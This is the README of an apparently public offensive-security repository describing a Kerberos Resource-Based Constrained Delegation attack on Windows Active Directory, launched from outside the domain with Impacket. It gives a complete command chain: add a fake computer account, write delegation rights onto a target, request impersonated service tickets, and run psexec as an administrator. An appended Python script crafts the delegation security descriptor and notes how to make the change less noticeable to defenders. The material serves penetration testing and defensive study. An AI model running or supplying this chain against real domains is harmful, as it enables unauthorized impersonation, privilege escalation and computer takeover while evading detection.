Repository: https://github.com/tothi/rbcd-attack (owner: tothi; language: Python; last pushed 2022-07-16; 487 stars, 62 forks at last sync)
Description: Kerberos Resource-Based Constrained Delegation Attack from Outside using Impacket

# Abusing Kerberos Resource-Based Constrained Delegation

## TL;DR

This repo is about a practical attack against Kerberos Resource-Based
Constrained Delegation (RBCD) in a Windows Active Directory domain.

> The difference from other common implementations is that we are
> launching the attack **from outside of the Windows Domain**, not from
> a domain-joined (usually Windows) computer.

The attack is implemented **using only Python3
[Impacket](https://www.secureauth.com/labs/open-source-tools/impacket)**
(and its dependencies). Tested on [Arch](https://www.archlinux.org/)
with up-to-date Impacket (0.9.21 as of writing).

![Attack Log](./rbcd-attack.png)

## The Attack

In summary, without going into deep details, the attack targets
a domain computer, specifically the service principals (SPNs such as
`cifs/` or `http/`) registered to the target computer account.

Prerequisites:

* a domain account with write access to the target computer object (specifically, write access to its `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute, e.g. GenericWrite or GenericAll on the object)
* permission to create new computer accounts (by default any authenticated domain user may add up to 10, governed by the domain's `MachineAccountQuota` attribute; check that it is not set to 0)
* LDAP (389/tcp) access to the DC for modifying the attribute, and SAMR (445/tcp) or LDAPS (636/tcp) access for creating the computer account (`addcomputer.py -method SAMR|LDAPS`)
* Kerberos (88/tcp) access to the DC for the S4U ticket requests

The attack path at a very high level:

1. Create a fake computer account
2. Abuse the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute of the target: add the fake computer as an identity allowed to delegate to it
3. Request impersonated Service Tickets (S4U2Self followed by S4U2Proxy) for the target computer

Benefit:

* Impersonated Service Tickets may allow high-level access to services on
the target like CIFS, HTTP, etc, if the impersonated account has privileges
there. If the impersonated account is a local administrator of the target
(e.g. a Domain Admin), this usually means takeover of the computer.

Note that accounts that are members of `Protected Users` or have the
"Account is sensitive and cannot be delegated" flag set are not delegatable,
so they cannot be impersonated this way.

## Common toolsets

The common toolsets for this attack operate on a domain-joined
Windows computer using:

* [Powermad](https://github.com/Kevin-Robertson/Powermad) for adding new computer accounts
* [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) from the [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) dev branch for abusing `msDS-AllowedToActOnBehalfOfOtherIdentity`
* [Rubeus](https://github.com/GhostPack/Rubeus) for S4U ticket operations

## Impacket implementation

This implementation uses pure [Impacket](https://github.com/SecureAuthCorp/impacket) from outside the domain.

### Creating the fake computer

Using the `addcomputer.py` example from Impacket, let's create a fake computer (called `evilcomputer`) with the low-privileged domain account `test`:

```
addcomputer.py -computer-name 'evilcomputer$' -computer-pass ev1lP@sS -dc-ip 192.168.33.203 ecorp.local/test:ohW9Lie0
```

### Modifying delegation rights

The script [rbcd.py](./rbcd.py) in this repo adds a security descriptor granting the
newly created `EVILCOMPUTER$` account delegation rights to the
`msDS-AllowedToActOnBehalfOfOtherIdentity` attribute of the target computer
(`WEB` here). This is the step that needs the write access listed in the prerequisites:

```
./rbcd.py -f EVILCOMPUTER -t WEB -dc-ip 192.168.33.203 ecorp\\test:ohW9Lie0
```

The script relies heavily on the Python classes of the `ntlmrelayx.py` Impacket example.
Run the script without options for help and an example invocation.

### Getting the impersonated service ticket

Now everything is ready for abusing the constrained delegation: an
S4U2Self request (made as `EVILCOMPUTER$` for the user to impersonate) followed by
an S4U2Proxy request yields an impersonated Service Ticket for the
target computer. With the `getST.py` Impacket example script:

```
getST.py -spn cifs/WEB.ecorp.local -impersonate admin -dc-ip 192.168.33.203 ecorp.local/EVILCOMPUTER$:ev1lP@sS
```

The above command fetches a CIFS Service Ticket on behalf of the targeted domain user `admin`
and stores it in the file `admin.ccache`.

After exporting the file path in the `KRB5CCNAME` environment variable, the ticket is usable by
Kerberos-aware clients (for the Impacket examples pass `-k -no-pass`, e.g.
`psexec.py -k -no-pass ecorp.local/admin@WEB.ecorp.local`).

```
export KRB5CCNAME=`pwd`/admin.ccache
klist
```

## References

For details about abusing Resource-Based Constrained Delegation:

* https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
* https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/
* http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/

And one of the most comprehensive presentations about Kerberos attacks:

* [Constructing Kerberos Attacks with Delegation Primitives slides](https://shenaniganslabs.io/media/Constructing%20Kerberos%20Attacks%20with%20Delegation%20Primitives.pdf) at Defcon by [Elad Shamir](https://twitter.com/elad_shamir) and [Matt Bush](https://twitter.com/3xocyte)
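To make concrete what the "Modifying delegation rights" step actually writes into the directory, the following is an added, stdlib-only Python example; it is not code from this repo or from Impacket. It builds the self-relative security descriptor stored in `msDS-AllowedToActOnBehalfOfOtherIdentity`, parses an existing value back, and appends a new trustee while keeping ACEs that are already there. The layout mirrors what the common RBCD tooling writes (owner and group `S-1-5-32-544`, control `SE_SELF_RELATIVE|SE_DACL_PRESENT`, one `ACCESS_ALLOWED_ACE` with mask `0xF01FF` per allowed account). The SID values are constructed placeholders: in a real run the fake computer's SID comes from its `objectSid` attribute over LDAP, and the resulting bytes are written to the target object with an LDAP modify (the part `rbcd.py` handles).

```python
"""Build, parse and extend the msDS-AllowedToActOnBehalfOfOtherIdentity value.

Added example (stdlib only); the SIDs used below are constructed placeholders.
Layout follows MS-DTYP: a self-relative SECURITY_DESCRIPTOR whose DACL holds
one ACCESS_ALLOWED_ACE per account allowed to delegate to the resource.
"""
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION_DS = 0x04
FULL_CONTROL = 0x000F01FF                 # mask the common RBCD tooling writes
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"   # owner/group used by that tooling
SD_HEADER = "<BBHIIII"    # Revision, Sbz1, Control, OffsetOwner/Group/Sacl/Dacl
ACL_HEADER = "<BBHHH"     # AclRevision, Sbz1, AclSize, AceCount, Sbz2


def sid_to_bytes(sid: str) -> bytes:
    """Canonical 'S-1-5-21-...' string -> binary SID (little-endian sub-authorities)."""
    parts = sid.split("-")
    if len(parts) < 4 or parts[0] != "S":
        raise ValueError("not a canonical SID: %r" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if len(subs) > 15:
        raise ValueError("too many sub-authorities")
    return (struct.pack("<BB", revision, len(subs))
            + authority.to_bytes(6, "big")            # IdentifierAuthority is big-endian
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf: bytes, offset: int = 0) -> tuple:
    """Decode a binary SID at offset; returns (canonical string, bytes consumed)."""
    revision, count = struct.unpack_from("<BB", buf, offset)
    authority = int.from_bytes(buf[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, offset + 8)
    return "-".join(["S", str(revision), str(authority), *map(str, subs)]), 8 + 4 * count


def build_rbcd_sd(allowed_sids, mask: int = FULL_CONTROL) -> bytes:
    """Self-relative SD with one ACCESS_ALLOWED_ACE per SID in allowed_sids."""
    aces = b""
    for sid in allowed_sids:
        sid_bin = sid_to_bytes(sid)
        # ACE header (AceType, AceFlags, AceSize), then Mask, then the trustee SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_bin), mask) + sid_bin
    dacl = struct.pack(ACL_HEADER, ACL_REVISION_DS, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    off_owner = struct.calcsize(SD_HEADER)            # 20
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(owner)                 # group SID is the same value as owner
    header = struct.pack(SD_HEADER, 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         off_owner, off_group, 0, off_dacl)   # OffsetSacl 0: no SACL
    return header + owner + owner + dacl


def parse_rbcd_sd(blob: bytes):
    """Return [(sid, mask), ...] for every ACCESS_ALLOWED_ACE in the SD's DACL."""
    revision, _, control, _, _, _, off_dacl = struct.unpack_from(SD_HEADER, blob, 0)
    if revision != 1:
        raise ValueError("unsupported SD revision %d" % revision)
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []                                     # no DACL: nobody may delegate
    _, _, _, ace_count, _ = struct.unpack_from(ACL_HEADER, blob, off_dacl)
    pos = off_dacl + struct.calcsize(ACL_HEADER)
    trustees = []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", blob, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            (mask,) = struct.unpack_from("<I", blob, pos + 4)
            trustees.append((bytes_to_sid(blob, pos + 8)[0], mask))
        pos += ace_size                               # other ACE types are skipped by size
    return trustees


def add_trustee(existing: bytes, new_sid: str) -> bytes:
    """Append new_sid without dropping delegations already configured on the target.

    Replacing the attribute with a single-ACE descriptor silently breaks
    legitimate delegations to the resource and is easy for defenders to notice.
    Read the current value first, decode it, and rebuild it with the extra SID.
    """
    current = [sid for sid, _ in parse_rbcd_sd(existing)] if existing else []
    if new_sid not in current:
        current.append(new_sid)
    return build_rbcd_sd(current)


if __name__ == "__main__":
    fake_computer_sid = "S-1-5-21-1111111111-2222222222-3333333333-1105"  # placeholder
    sd = build_rbcd_sd([fake_computer_sid])
    print(len(sd), "bytes:", sd.hex())
    print(parse_rbcd_sd(sd))
```

After the LDAP modify, read the attribute back and run it through `parse_rbcd_sd` to confirm the fake computer's SID is present with the expected mask; an empty result means the DACL was not written (or was cleared) and the S4U2Proxy step will be refused.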